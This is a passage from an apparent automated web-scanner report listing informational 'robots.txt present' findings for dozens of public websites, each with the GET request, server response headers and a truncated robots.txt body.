Server: Apache/2.2.9 (Fedora)
Last-Modified: Wed, 20 Apr 2011 14:42:05 GMT
ETag: "2c39a06-29e-4a15aa0dfe940"
Accept-Ranges: bytes
Content-Length: 670
Connection: close
Content-Type: text/plain; charset=UTF-8

# file: robots.txt,v 1.0
# www.busytrade.com
# robots.txt <URL:http://www.robotstxt.org/wc/exclusion.html#robotstxt>
# Format is:
# User-agent: <name of spider>
# Disallow: <nothing> | <pa
...[SNIP]...

27.267. http://www.buzz-media.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzz-media.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzz-media.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:29:47 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.buzz-media.com
X-Powered-By: PHP/5.3.5
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.buzz-media.com/xmlrpc.php
Last-Modified: Wed, 04 May 2011 01:29:47 +0000
Cache-Control: max-age=300, must-revalidate
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.268. http://www.byond.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.byond.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.byond.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:15 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 19:48:38 GMT
ETag: "1d1876d-18-f746b180"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /


27.269. http://www.bystolic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bystolic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bystolic.com

Response

HTTP/1.1 200 OK
Content-Length: 61
Content-Type: text/plain
Last-Modified: Wed, 04 Aug 2010 18:45:00 GMT
Accept-Ranges: bytes
ETag: "0de6024534cb1:706c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:23:17 GMT
Connection: keep-alive
Set-Cookie: NSC_cztupmjd-wjq=8efb302d3660;path=/

User-agent: *

Disallow: /*?WT.srch
Disallow: /*?mptts


27.270. http://www.byucougars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.byucougars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.byucougars.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:19 GMT
Server: Apache/2.2.3 (CentOS)
ETag: W/"23-1219330945000"
Last-Modified: Thu, 21 Aug 2008 15:02:25 GMT
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow:

27.271. http://www.cabinetgiant.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cabinetgiant.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cabinetgiant.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:37 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2010 15:36:24 GMT
Accept-Ranges: bytes
Content-Length: 833
Cache-Control: max-age=31536000
Expires: Thu, 03 May 2012 02:39:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap: https://www.cabinetgiant.com/sitemap.xml

User-agent: Googlebot
Disallow: /index.php/
Disallow: /*?
Disallow: /*.js$
Disallow: /*.css$
Disallow: /checkout/
Disallow: /tag/
Disallow: /catalogs
...[SNIP]...

27.272. http://www.cabrillo.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cabrillo.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cabrillo.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 06 Jul 2009 22:45:11 GMT
ETag: "2105d2-7c-42334bc0"
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *Disallow: /_mm/Disallow: /_notes/Disallow: /_baks/Disallow: /MMWIP/User-agent: googlebotDisallow: *.csi

27.273. http://www.calarttech.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calarttech.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calarttech.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:36:19 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 12:22:36 GMT
ETag: "e4c15a-ea4-4a1f99cc61b00"
Accept-Ranges: bytes
Content-Length: 3748
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /plugi
...[SNIP]...

27.274. http://www.calvarychapel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.calvarychapel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calvarychapel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 01 Mar 2010 19:14:51 GMT
ETag: "2a68123-130-480c21038a0c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.275. http://www.camdenpark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.camdenpark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.camdenpark.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:44 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.camdenpark.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.276. http://www.cameoez.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cameoez.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cameoez.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:23 GMT
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 03 May 2011 11:03:59 GMT
ETag: "2be92a9-f4-18d345c0"
Accept-Ranges: bytes
Content-Length: 244
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Crawl-delay: 120
Disallow: /AdminConsole/
Disallow: /smarty/
Disallow: /cgi-bin/
Disallow: /demo/
Disallow: /img/
Disallow: /Images/
Disallow: /images/
Disallow: /imgSmall/
Disallow: /sc
...[SNIP]...

27.277. http://www.camzone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.camzone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.camzone.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:03 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_ssl/2.8.31 OpenSSL/0.9.7e-p1
Last-Modified: Thu, 26 Aug 2010 00:30:44 GMT
ETag: "33c011-28-4c75b5b4"
Accept-Ranges: bytes
Content-Length: 40
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /page/
Allow: /

27.278. http://www.canada.travel/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canada.travel
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canada.travel

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "ec27dae6fcc03ff9a27bf6c5abd73e0e:1208443927"
Last-Modified: Thu, 17 Apr 2008 14:52:07 GMT
Accept-Ranges: bytes
Content-Length: 519
Content-Type: text/plain
Date: Wed, 04 May 2011 01:56:20 GMT
Connection: close
X-N: S

# To remove the staging sites from all user-agent from and prevent them crawling the staging sites, with the exceptions of the user-agents of ctc google search appliance and Akamai.

User-agent: *
Dis
...[SNIP]...

27.279. http://www.canadianblackbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canadianblackbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canadianblackbook.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 13 Oct 2010 09:47:43 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Content-Length: 180
Date: Wed, 04 May 2011 04:13:18 GMT
X-Varnish: 525755517
Age: 0
Via: 1.1 varnish
Connection: close

User-Agent: *
Disallow: /styles/
Disallow: /images/
Disallow: /js/
Disallow: /research/sites/default/files/css/
Disallow: /research/sites/default/files/js/
Disallow: /popup-error/

27.280. http://www.canfieldfair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canfieldfair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canfieldfair.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:45 GMT
Server: Apache/2
Last-Modified: Thu, 17 Mar 2011 20:25:04 GMT
ETag: "136052-c9-49eb374dfc800"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /e
Disallow: /bufiles
Disallow: /webedit_images
Disallow: /webedit_includes
Disallow: /webedit_templates
Disallow: /corndog-blog
Sitemap: http://www.canfieldfair.com/sitemap.xm
...[SNIP]...

27.281. http://www.canshetakeitbig.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canshetakeitbig.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canshetakeitbig.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:51 GMT
Server: Apache
Last-Modified: Wed, 03 Dec 2008 22:01:37 GMT
ETag: "247a3a6-2c-45d2b96833240"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

27.282. http://www.cantstopthebleeding.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cantstopthebleeding.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cantstopthebleeding.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 04 Feb 2011 17:47:07 GMT
ETag: "8076-1a8-49b787881dcc0"
Accept-Ranges: bytes
Content-Length: 424
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /wp-content/
Disallow: /wp-icludes/
Disallow: /trackback/
Disallow: /wp-admin/
Disallow: /archives/
Disallow: /category/
Disallow: /tag/*
Disallow: /tag/
Disallow: /wp-*
Disal
...[SNIP]...

27.283. http://www.canvaspeople.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canvaspeople.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canvaspeople.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:49 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 13 Jan 2011 20:43:42 GMT
Accept-Ranges: bytes
Content-Length: 205
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /getChildOptionsForSize/
Disallow: /canvas/getAddressFormFields/
Disallow: /canvas/getReceipt
Disallow: /returnPolicy
Disallow: /order-your-canvas
Disallow: /canvas/re
...[SNIP]...

27.284. http://www.capitolhillseattle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitolhillseattle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.capitolhillseattle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/plain;charset=UTF-8
Date: Wed, 04 May 2011 02:00:53 GMT
Connection: close

User-agent: *

Disallow: /login
Disallow: /login/
Disallow: /post
Disallow: /postevent
Disallow: /postreview
Disallow: /share
Disallow: /stories/map
Disallow: /discussions/map
Disallow: /announcements
...[SNIP]...

27.285. http://www.car-forums.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.car-forums.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.car-forums.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:03 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Tue, 23 Mar 2004 14:05:11 GMT
ETag: "8c0162-1513-40604417"
Accept-Ranges: bytes
Content-Length: 5395
Connection: close
Content-Type: text/plain

#
# car-forums.com: robots.txt
# Please, we do NOT allow nonauthorized robots any longer.

User-agent: BotRightHere
Disallow: /

User-agent: WebZip
Disallow: /

User-agent: larbin
Disallow: /

User-ag
...[SNIP]...

27.286. http://www.carbodydesign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carbodydesign.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carbodydesign.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.carbodydesign.com/admin/wordpress/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.287. http://www.carbs-information.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carbs-information.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carbs-information.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:45 GMT
Server: Apache
Last-Modified: Sun, 16 May 2004 14:39:32 GMT
ETag: "1b81c1-20-40a77d24"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/

27.288. http://www.carecalendar.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carecalendar.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carecalendar.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:31 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
Last-Modified: Tue, 05 Apr 2011 06:36:42 GMT
ETag: "e20668f-288-4a0261972ba13"
Accept-Ranges: bytes
Content-Length: 648
Connection: close
Content-Type: text/plain

User-agent:    *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /impray
Disallow: /load
Disallow: /log
Disallow: /pray
Disallow: /shelby/logon
Disallow: /shelby/dis
Disallow: /shelby/prayer
Disallow: /
...[SNIP]...

27.289. http://www.careered.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careered.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careered.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:43:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET; Sitecore CMS
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: career-ed#sc_wede=1; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 37

User-agent: *
Disallow: /sitecore/

27.290. http://www.careersingrocery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careersingrocery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careersingrocery.com

Response

HTTP/1.1 200 OK
Content-Length: 781
Content-Type: text/plain
Content-Location: http://www.careersingrocery.com/robots.txt
Last-Modified: Sun, 11 Jul 2010 23:30:15 GMT
Accept-Ranges: bytes
ETag: "a2675845121cb1:3e80"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:41:58 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /ADMIN/
Disallow: /Automation/
Disallow: /caboose/
Disallow: /CandidateLists/
Disallow: /cgi-bin/
Disallow: /companies/
Disallow: /CSS/
Disallow: /em
...[SNIP]...

27.291. http://www.carefreefreshstart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carefreefreshstart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carefreefreshstart.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:20:33 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 19:08:15 GMT
ETag: "106d2fb-65b-49f16f75ce5c0"
Accept-Ranges: bytes
Content-Length: 1627
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9 2007/06/27 22:37:44 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites lik
...[SNIP]...

27.292. http://www.carionltd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carionltd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carionltd.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:45 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.11 mod_ssl/2.8.31 OpenSSL/0.9.8l
Last-Modified: Thu, 08 Apr 2010 07:52:16 GMT
ETag: "3ab00a4-d2-4bbd8b30"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /register/
Disallow: /privacy-policy.php
Disallow: /rate.php
Disallow: /insurance-plans.php
Disallow: /review.php
Disallow: /med.php
Disallow: /hospmed.php
Disallow: /d
...[SNIP]...

27.293. http://www.carnivalwarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carnivalwarehouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carnivalwarehouse.com

Response

HTTP/1.1 200 OK
Content-Length: 156
Content-Type: text/plain
Last-Modified: Mon, 26 Apr 2010 04:49:19 GMT
Accept-Ranges: bytes
ETag: "22ce32d5fbe4ca1:2dbb6"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:18:06 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow: /databases/
Disallow: /fp_db/

User-agent: *
Disallow: /databases/
Disallow: /forum/
Disallow: /fp_db/

27.294. http://www.carpetone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carpetone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carpetone.com

Response

HTTP/1.0 200 OK
Content-Length: 127
Content-Type: text/plain
Content-Location: http://www.carpetone.com/robots.txt
Last-Modified: Thu, 13 Jan 2011 21:26:13 GMT
Accept-Ranges: bytes
ETag: "a31d6c8168b3cb1:3f3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:55:45 GMT
Connection: close

User-agent: *
Disallow: /catalog/*
Disallow: /shared/shoppingcart*
Disallow: /shared/checkout*
Disallow: /shared/myaccount*

27.295. http://www.carrentalexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carrentalexpress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carrentalexpress.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:54 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a
Vary: Accept-Encoding,User-
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:11:54 GMT
Last-Modified: Mon, 21 Mar 2011 18:09:14 GMT
ETag: "46c0685-8f7-4d87944a"
Accept-Ranges: bytes
Content-Length: 2295
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.296. http://www.cashexplosionshow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cashexplosionshow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cashexplosionshow.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:10 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.cashexplosionshow.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.cashexplosionshow.com/sitemap.xml.gz

27.297. http://www.cashinarush.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cashinarush.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cashinarush.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:26 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.3 mod_ssl/2.8.31 OpenSSL/0.9.8o
Last-Modified: Wed, 05 Jan 2011 19:46:44 GMT
ETag: "30be78b-e7-4d24caa4"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.298. http://www.cashtxtclub1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cashtxtclub1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cashtxtclub1.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Feb 2011 23:47:01 GMT
ETag: "1be00bd-e6-49be214d10740"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 230
Connection: close

User-agent: *

#For now we disallow everything
Disallow: /
Disallow: /o.php
Disallow: /p.php
Disallow: /confirm.php
Disallow: /index.php?_ifr_=privacy
Disallow: /index.php?_ifr_=termsconditions
Disall
...[SNIP]...

27.299. http://www.cat-world.com.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cat-world.com.au
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cat-world.com.au

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:36:18 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "145-4acad297-0"
Last-Modified: Tue, 06 Oct 2009 05:16:07 GMT
Content-Type: text/plain
Content-Length: 325

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.300. http://www.catchfence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.catchfence.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.catchfence.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:54 GMT
Server: Apache/2.2.14
Last-Modified: Thu, 04 Nov 2010 12:52:06 GMT
ETag: "10e329-235-49439a00b8980"
Accept-Ranges: bytes
Content-Length: 565
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ads/
Disallow: /forums/
Disallow: /adverts/
Disallow: /cgi-binpoll/
Disallow: /cfproposal/
Disallow: /Copy of fanfestgallery2/
Disallow: /util/
Disallow: /wp-admin/
Disallow:
...[SNIP]...

27.301. http://www.catchwine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.catchwine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.catchwine.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:04 GMT
Server: Apache
Last-Modified: Thu, 18 Mar 2010 03:04:02 GMT
ETag: "2144f3-98-4820a7b9ccc80"
Accept-Ranges: bytes
Content-Length: 152
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /maps
Disallow: /adm/
Disallow: /info
Disallow: /wine_info
Disallow: /winery_manager/
Disallow: /manager/
Disallow: *.php

27.302. http://www.cavemancircus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cavemancircus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cavemancircus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Wed, 04 May 2011 02:18:52 GMT
X-Powered-By: PHP/5.2.11
Vary: Cookie
X-Pingback: http://cavemancircus.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset="UTF-8"

User-agent: *
Disallow:

27.303. http://www.cayenne.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cayenne.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cayenne.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:28:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 20 Jul 2010 17:35:01 GMT
ETag: "fe8d64-72-48bd51ad05b40"
Accept-Ranges: bytes
Content-Length: 114
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 04:28:51 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow:
Disallow: /cms/
Disallow: /api/
Sitemap: http://www.cayenne.com/sitemap.xml

27.304. http://www.cbv.ns.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbv.ns.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbv.ns.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:16 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 07 Feb 2011 23:36:10 GMT
ETag: "356891d-d5-49bb9b254ce80"
Accept-Ranges: bytes
Content-Length: 213
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /supportforstudents/
Disallow: /hrvtl/
Disallow: /Admin/Principal/
Disallow: /teachervacancy/

http://www.cbv.ns.ca/web_sitemap_dd3a0466.xml.gz # Added by Google Sitem
...[SNIP]...

27.305. http://www.cc.org/favicon.ico  previous  next

Summary

